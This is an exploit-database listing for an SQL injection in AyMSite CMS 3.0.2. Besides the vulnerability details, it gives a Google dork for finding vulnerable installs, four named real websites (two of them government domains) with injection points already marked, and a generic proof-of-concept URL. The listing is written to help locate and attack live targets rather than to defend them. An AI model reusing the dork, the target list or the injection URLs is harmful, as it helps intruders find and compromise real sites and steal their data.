AyMSite CMS 3.0.2 SQL Injection

2012.06.12
Credit: xDarkSton3x
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################## # Exploit Title: AyMSite V 3.0.2 [ sqli ] # Vendor: http://www.aymsoft.com/ # Date: 08/06/2012 # Author: xDarkSton3x #Dork: inurl:aym_index.php?option= # E-mail : xdarkston3x@msn.com # Category: webapps # Example Sites : http://www.satena.gov.co/aym_index.php?option=ciudadano&pag_cat_id=3&pag_id=%27 http://www.cartagenamusicfestival.com/aym_index.php?option=artists&alr=&pag_id=%27 http://www.sht.com.co/aym_index.php?option=servicios&pag_cat_id=5&pag_id=%27 http://www.findeter.gov.co/aymsite/aym_index.php?&option=servicios&pag_cat_id=%27 ################################################## [~]Exploit/p0c : http://www.site.com/aym_index.php?option=var=&var2=[sqli] Greetz: [ Insecurity Peru ] - [ Rs4 - B4nz0k - FailSoft - W4rn1ng - Dedalo - Maztor ]

References:

http://www.aymsoft.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top